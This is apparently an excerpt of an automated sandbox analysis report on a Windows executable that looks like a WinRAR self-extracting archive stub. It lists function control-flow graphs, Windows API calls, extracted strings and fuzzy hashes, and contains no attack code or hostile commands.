                                                                                                                                                                          control_flow_graph 1523 7ff70ecf400c-7ff70ecf40e1 call 7ff70ecdde94 call 7ff70ecd7a28 call 7ff70eced0a8 call 7ff70ecf74c0 call 7ff70eced724 1534 7ff70ecf40e3-7ff70ecf40f8 1523->1534 1535 7ff70ecf4118-7ff70ecf413b 1523->1535 1538 7ff70ecf4113 call 7ff70ecf5b1c 1534->1538 1539 7ff70ecf40fa-7ff70ecf410d 1534->1539 1536 7ff70ecf4172-7ff70ecf4195 1535->1536 1537 7ff70ecf413d-7ff70ecf4152 1535->1537 1544 7ff70ecf41cc-7ff70ecf41ef 1536->1544 1545 7ff70ecf4197-7ff70ecf41ac 1536->1545 1542 7ff70ecf4154-7ff70ecf4167 1537->1542 1543 7ff70ecf416d call 7ff70ecf5b1c 1537->1543 1538->1535 1539->1538 1540 7ff70ecf4695-7ff70ecf469a call 7ff70ecfae94 1539->1540 1559 7ff70ecf469b-7ff70ecf46c7 call 7ff70ecfae94 1540->1559 1542->1540 1542->1543 1543->1536 1550 7ff70ecf4226-7ff70ecf4232 GetCommandLineW 1544->1550 1551 7ff70ecf41f1-7ff70ecf4206 1544->1551 1548 7ff70ecf41ae-7ff70ecf41c1 1545->1548 1549 7ff70ecf41c7 call 7ff70ecf5b1c 1545->1549 1548->1540 1548->1549 1549->1544 1553 7ff70ecf43ff-7ff70ecf4416 call 7ff70ecd7c10 1550->1553 1554 7ff70ecf4238-7ff70ecf426f call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecf0620 1550->1554 1556 7ff70ecf4221 call 7ff70ecf5b1c 1551->1556 1557 7ff70ecf4208-7ff70ecf421b 1551->1557 1567 7ff70ecf4441-7ff70ecf459c call 7ff70ecd1b70 SetEnvironmentVariableW GetLocalTime call 7ff70ecd61e8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff70eceeb64 call 7ff70ecd9cac call 7ff70ecea430 * 2 DialogBoxParamW call 7ff70ecea524 * 2 1553->1567 1568 7ff70ecf4418-7ff70ecf443d call 7ff70ecd1b70 call 7ff70ecf6e10 1553->1568 1589 7ff70ecf42a4-7ff70ecf42ab 1554->1589 1590 7ff70ecf4271-7ff70ecf4284 1554->1590 1556->1550 1557->1540 1557->1556 1570 7ff70ecf4712-7ff70ecf4728 call 7ff70ecdbbf8 1559->1570 1571 7ff70ecf46c9-7ff70ecf46da 1559->1571 1683 7ff70ecf45a4-7ff70ecf45ab 1567->1683 1684 7ff70ecf459e Sleep 1567->1684 1568->1567 1592 7ff70ecf4775-7ff70ecf477f 1570->1592 1593 7ff70ecf472a-7ff70ecf473d 1570->1593 1575 7ff70ecf46dc-7ff70ecf46ef 1571->1575 1576 7ff70ecf46f8-7ff70ecf470b call 7ff70ecf5b1c 1571->1576 1581 7ff70ecf46f5 1575->1581 1582 7ff70ecf4964-7ff70ecf49b0 call 7ff70ecfae94 call 7ff70ecf5390 1575->1582 1576->1570 1581->1576 1637 7ff70ecf49b5-7ff70ecf49eb 1582->1637 1601 7ff70ecf4393-7ff70ecf43ca call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecf3810 1589->1601 1602 7ff70ecf42b1-7ff70ecf42cb OpenFileMappingW 1589->1602 1599 7ff70ecf4286-7ff70ecf4299 1590->1599 1600 7ff70ecf429f call 7ff70ecf5b1c 1590->1600 1596 7ff70ecf4781-7ff70ecf4794 1592->1596 1597 7ff70ecf47cc-7ff70ecf47d6 1592->1597 1603 7ff70ecf473f-7ff70ecf4752 1593->1603 1604 7ff70ecf475b-7ff70ecf476e call 7ff70ecf5b1c 1593->1604 1608 7ff70ecf4796-7ff70ecf47a9 1596->1608 1609 7ff70ecf47b2-7ff70ecf47c5 call 7ff70ecf5b1c 1596->1609 1611 7ff70ecf4823-7ff70ecf482d 1597->1611 1612 7ff70ecf47d8-7ff70ecf47eb 1597->1612 1599->1559 1599->1600 1600->1589 1601->1553 1661 7ff70ecf43cc-7ff70ecf43df 1601->1661 1615 7ff70ecf42d1-7ff70ecf42f1 MapViewOfFile 1602->1615 1616 7ff70ecf4388-7ff70ecf4391 CloseHandle 1602->1616 1603->1582 1605 7ff70ecf4758 1603->1605 1604->1592 1605->1604 1608->1582 1622 7ff70ecf47af 1608->1622 1609->1597 1619 7ff70ecf482f-7ff70ecf4842 1611->1619 1620 7ff70ecf487a-7ff70ecf4884 1611->1620 1625 7ff70ecf47ed-7ff70ecf4800 1612->1625 1626 7ff70ecf4809-7ff70ecf481c call 7ff70ecf5b1c 1612->1626 1615->1616 1617 7ff70ecf42f7-7ff70ecf4327 UnmapViewOfFile MapViewOfFile 1615->1617 1616->1553 1617->1616 1630 7ff70ecf4329-7ff70ecf4382 call 7ff70ecedd08 call 7ff70ecf3810 call 7ff70ecdbd30 call 7ff70ecdbe7c call 7ff70ecdbeec UnmapViewOfFile 1617->1630 1631 7ff70ecf4844-7ff70ecf4857 1619->1631 1632 7ff70ecf4860-7ff70ecf4873 call 7ff70ecf5b1c 1619->1632 1634 7ff70ecf4886-7ff70ecf4899 1620->1634 1635 7ff70ecf48d1-7ff70ecf495e call 7ff70ecd1b70 * 10 1620->1635 1622->1609 1625->1582 1638 7ff70ecf4806 1625->1638 1626->1611 1630->1616 1631->1582 1643 7ff70ecf485d 1631->1643 1632->1620 1646 7ff70ecf489b-7ff70ecf48ae 1634->1646 1647 7ff70ecf48b7-7ff70ecf48ca call 7ff70ecf5b1c 1634->1647 1635->1582 1648 7ff70ecf49ed 1637->1648 1638->1626 1643->1632 1646->1582 1654 7ff70ecf48b4 1646->1654 1647->1635 1648->1648 1654->1647 1665 7ff70ecf43e1-7ff70ecf43f4 1661->1665 1666 7ff70ecf43fa call 7ff70ecf5b1c 1661->1666 1665->1666 1670 7ff70ecf468f-7ff70ecf4694 call 7ff70ecfae94 1665->1670 1666->1553 1670->1540 1687 7ff70ecf45b2-7ff70ecf45d5 call 7ff70ecdbc5c DeleteObject 1683->1687 1688 7ff70ecf45ad call 7ff70ecedac4 1683->1688 1684->1683 1696 7ff70ecf45dd-7ff70ecf45e4 1687->1696 1697 7ff70ecf45d7 DeleteObject 1687->1697 1688->1687 1699 7ff70ecf45e6-7ff70ecf45ed 1696->1699 1700 7ff70ecf4600-7ff70ecf4611 1696->1700 1697->1696 1699->1700 1702 7ff70ecf45ef-7ff70ecf45fb call 7ff70ecd3ef4 1699->1702 1703 7ff70ecf4625-7ff70ecf4632 1700->1703 1704 7ff70ecf4613-7ff70ecf461f call 7ff70ecf3928 CloseHandle 1700->1704 1702->1700 1707 7ff70ecf4634-7ff70ecf4641 1703->1707 1708 7ff70ecf4657-7ff70ecf465c call 7ff70eced120 1703->1708 1704->1703 1713 7ff70ecf4643-7ff70ecf464b 1707->1713 1714 7ff70ecf4651-7ff70ecf4653 1707->1714 1719 7ff70ecf4661-7ff70ecf468e call 7ff70ecf5c30 1708->1719 1713->1708 1717 7ff70ecf464d-7ff70ecf464f 1713->1717 1714->1708 1718 7ff70ecf4655 1714->1718 1717->1708 1718->1708
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 3767324925-3710569615
                                                                                                                                                                          • Opcode ID: a58a6387ee17bb6639eb3cae4dff6e3da3947667857c240d721c3ea59f8806c2
                                                                                                                                                                          • Instruction ID: b038bbad2ca370c2fd33099b68ca45234cac89e74342193d9097bcaefc816071
                                                                                                                                                                          • Opcode Fuzzy Hash: a58a6387ee17bb6639eb3cae4dff6e3da3947667857c240d721c3ea59f8806c2
                                                                                                                                                                          • Instruction Fuzzy Hash: E642A372B19B82A1EB14EF24EC542BEA365FF84B84F844236DA9D47A95DF3DD540C320
                                                                                                                                                                          Function 00007FF70ECDA8AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                                                                                          • String ID: $%s:$CAPTION
                                                                                                                                                                          • API String ID: 2100155373-404845831
                                                                                                                                                                          • Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                          • Instruction ID: ab76762f9df008b1a6fb46394a885ff2a6e3d033f0a24af16706d38a02b22ada
                                                                                                                                                                          • Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F91C536B1864596E714EF39AD006AAE7A1FBC4784F845135EE4D47B98CF3EE805CB10
                                                                                                                                                                          Function 00007FF70ECEC260 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                                                                                                          • String ID: PNG
                                                                                                                                                                          • API String ID: 3656887471-364855578
                                                                                                                                                                          • Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                          • Instruction ID: c06e510363a6f5b80377cf02113ffb1a56fdffb174c30ab379f53d14127196fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 68416221B0974691EB14EB16DC5477AF3A0EF48B94F884435CE0D873A4EF7DE4449720
                                                                                                                                                                          Function 00007FF70ECD647C Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 2240 7ff70ecd647c-7ff70ecd64b3 2241 7ff70ecd6592-7ff70ecd659f FindNextFileW 2240->2241 2242 7ff70ecd64b9-7ff70ecd64c1 2240->2242 2245 7ff70ecd65b3-7ff70ecd65b6 2241->2245 2246 7ff70ecd65a1-7ff70ecd65b1 GetLastError 2241->2246 2243 7ff70ecd64c3 2242->2243 2244 7ff70ecd64c6-7ff70ecd64d8 FindFirstFileW 2242->2244 2243->2244 2244->2245 2249 7ff70ecd64de-7ff70ecd6506 call 7ff70ecd80b0 2244->2249 2247 7ff70ecd65d1-7ff70ecd6613 call 7ff70ecfaf0c call 7ff70ecd12bc call 7ff70ecd8dc4 2245->2247 2248 7ff70ecd65b8-7ff70ecd65c0 2245->2248 2250 7ff70ecd658a-7ff70ecd658d 2246->2250 2276 7ff70ecd6615-7ff70ecd662c 2247->2276 2277 7ff70ecd664c-7ff70ecd66a6 call 7ff70ecde904 * 3 2247->2277 2252 7ff70ecd65c5-7ff70ecd65cc call 7ff70ecd1c80 2248->2252 2253 7ff70ecd65c2 2248->2253 2260 7ff70ecd6527-7ff70ecd6530 2249->2260 2261 7ff70ecd6508-7ff70ecd6524 FindFirstFileW 2249->2261 2255 7ff70ecd66ab-7ff70ecd66ce call 7ff70ecf5c30 2250->2255 2252->2247 2253->2252 2264 7ff70ecd6532-7ff70ecd6549 2260->2264 2265 7ff70ecd6569-7ff70ecd656d 2260->2265 2261->2260 2267 7ff70ecd6564 call 7ff70ecf5b1c 2264->2267 2268 7ff70ecd654b-7ff70ecd655e 2264->2268 2265->2245 2269 7ff70ecd656f-7ff70ecd657e GetLastError 2265->2269 2267->2265 2268->2267 2271 7ff70ecd66d5-7ff70ecd66db call 7ff70ecfae94 2268->2271 2273 7ff70ecd6580-7ff70ecd6586 2269->2273 2274 7ff70ecd6588 2269->2274 2273->2250 2273->2274 2274->2250 2280 7ff70ecd662e-7ff70ecd6641 2276->2280 2281 7ff70ecd6647 call 7ff70ecf5b1c 2276->2281 2277->2255 2280->2281 2284 7ff70ecd66cf-7ff70ecd66d4 call 7ff70ecfae94 2280->2284 2281->2277 2284->2271
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 474548282-0
                                                                                                                                                                          • Opcode ID: 0b8333a0f29a327c36cbe3270ce1716225374cdc2a996147068cd886246ff935
                                                                                                                                                                          • Instruction ID: 0913a497b7e5f1a6ba6eb716b1ff0fd022ada47b71a97babb7cc0278526140d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b8333a0f29a327c36cbe3270ce1716225374cdc2a996147068cd886246ff935
                                                                                                                                                                          • Instruction Fuzzy Hash: A161D672A0CA4691DA10EB24E84427EA361FF857A4F904331EABD437D8EF3ED584C710
                                                                                                                                                                          Function 00007FF70ECE569C Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 0-112844655
                                                                                                                                                                          • Opcode ID: 38fcd14a0c0e22dcc02e21086db45a874c8db68944d9ab85a23f3bc0e9adee56
                                                                                                                                                                          • Instruction ID: 7db685667dccac08574de7c87c098d6db5174d4dc600c411d4abea37c8ae8b53
                                                                                                                                                                          • Opcode Fuzzy Hash: 38fcd14a0c0e22dcc02e21086db45a874c8db68944d9ab85a23f3bc0e9adee56
                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE1E533A186819BE724DF28D8402BEB7A1FB8874CF544139DA5D57B88DB3EE851DB10
                                                                                                                                                                          Function 00007FF70ECE6294 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4cb80b51aadf55173622e9201162bdeefa438da09f0e939214a635ea07f0a5fc
                                                                                                                                                                          • Instruction ID: c16ce12f9fc56576cb1f58b2d90e9993357f0efed6a1aeb2f5659317df9b2488
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb80b51aadf55173622e9201162bdeefa438da09f0e939214a635ea07f0a5fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 862225B2E2CA52A2EA10AB249C5017EF790FF6075CF990135DA5E477D4DF7EE800A760
                                                                                                                                                                          Function 00007FF70ECF5390 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 195libraryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1724 7ff70ecf5390-7ff70ecf5419 call 7ff70ecf4fe8 1727 7ff70ecf5444-7ff70ecf5461 1724->1727 1728 7ff70ecf541b-7ff70ecf543f call 7ff70ecf52f8 RaiseException 1724->1728 1730 7ff70ecf5476-7ff70ecf547a 1727->1730 1731 7ff70ecf5463-7ff70ecf5474 1727->1731 1736 7ff70ecf5648-7ff70ecf5665 1728->1736 1733 7ff70ecf547d-7ff70ecf5489 1730->1733 1731->1733 1734 7ff70ecf548b-7ff70ecf549d 1733->1734 1735 7ff70ecf54aa-7ff70ecf54ad 1733->1735 1744 7ff70ecf54a3 1734->1744 1745 7ff70ecf5619-7ff70ecf5623 1734->1745 1737 7ff70ecf54b3-7ff70ecf54b6 1735->1737 1738 7ff70ecf5554-7ff70ecf555b 1735->1738 1742 7ff70ecf54cd-7ff70ecf54e2 LoadLibraryExA 1737->1742 1743 7ff70ecf54b8-7ff70ecf54cb 1737->1743 1740 7ff70ecf556f-7ff70ecf5572 1738->1740 1741 7ff70ecf555d-7ff70ecf556c 1738->1741 1746 7ff70ecf5615 1740->1746 1747 7ff70ecf5578-7ff70ecf557c 1740->1747 1741->1740 1748 7ff70ecf54e4-7ff70ecf54f7 GetLastError 1742->1748 1749 7ff70ecf5539-7ff70ecf5542 1742->1749 1743->1742 1743->1749 1744->1735 1756 7ff70ecf5625-7ff70ecf5636 1745->1756 1757 7ff70ecf5640 call 7ff70ecf52f8 1745->1757 1746->1745 1754 7ff70ecf557e-7ff70ecf5582 1747->1754 1755 7ff70ecf55ab-7ff70ecf55be GetProcAddress 1747->1755 1758 7ff70ecf550e-7ff70ecf5534 call 7ff70ecf52f8 RaiseException 1748->1758 1759 7ff70ecf54f9-7ff70ecf550c 1748->1759 1750 7ff70ecf5544-7ff70ecf5547 FreeLibrary 1749->1750 1751 7ff70ecf554d 1749->1751 1750->1751 1751->1738 1754->1755 1761 7ff70ecf5584-7ff70ecf558f 1754->1761 1755->1746 1760 7ff70ecf55c0-7ff70ecf55d3 GetLastError 1755->1760 1756->1757 1769 7ff70ecf5645 1757->1769 1758->1736 1759->1749 1759->1758 1765 7ff70ecf55d5-7ff70ecf55e8 1760->1765 1766 7ff70ecf55ea-7ff70ecf5611 call 7ff70ecf52f8 RaiseException call 7ff70ecf4fe8 1760->1766 1761->1755 1767 7ff70ecf5591-7ff70ecf5598 1761->1767 1765->1746 1765->1766 1766->1746 1767->1755 1771 7ff70ecf559a-7ff70ecf559f 1767->1771 1769->1736 1771->1755 1774 7ff70ecf55a1-7ff70ecf55a9 1771->1774 1774->1746 1774->1755
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 282135826-2852464175
                                                                                                                                                                          • Opcode ID: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                          • Instruction ID: 6f08dfaed9f23ddbd7fc9e54858eefaf83f0f5bc941634411979e10b8ae4f1aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ba3ac7ad01aad9b5bbf5288423d8bdca45e536d0fe216ed71dd1fdc31554d99
                                                                                                                                                                          • Instruction Fuzzy Hash: 49916C32A19B529AEB00EF65DC546ADB3A1FF08799F894436DE0D07B54EF39E844C720
                                                                                                                                                                          Function 00007FF70ECD9CDC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF70ECD9254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70ECD9389
                                                                                                                                                                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECDA375
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECDA82F
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECDA835
                                                                                                                                                                            • Part of subcall function 00007FF70ECE033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF70ECD9CBA), ref: 00007FF70ECE0369
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                          • API String ID: 3629253777-3268106645
                                                                                                                                                                          • Opcode ID: 988e682dbb3b4c783be54ccfebef63e85019313b811fb06679e680b09018e736
                                                                                                                                                                          • Instruction ID: bed128e57b34e41f6b8ad3e1ff29893fad78eada82d8cf48c304541397caf56a
                                                                                                                                                                          • Opcode Fuzzy Hash: 988e682dbb3b4c783be54ccfebef63e85019313b811fb06679e680b09018e736
                                                                                                                                                                          • Instruction Fuzzy Hash: 4562BE62A1DA82A5EB10EB25C8482BEA365FF40784FC04132DA5E476D5EF7FE545C360
                                                                                                                                                                          Function 00007FF70ECF3030 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
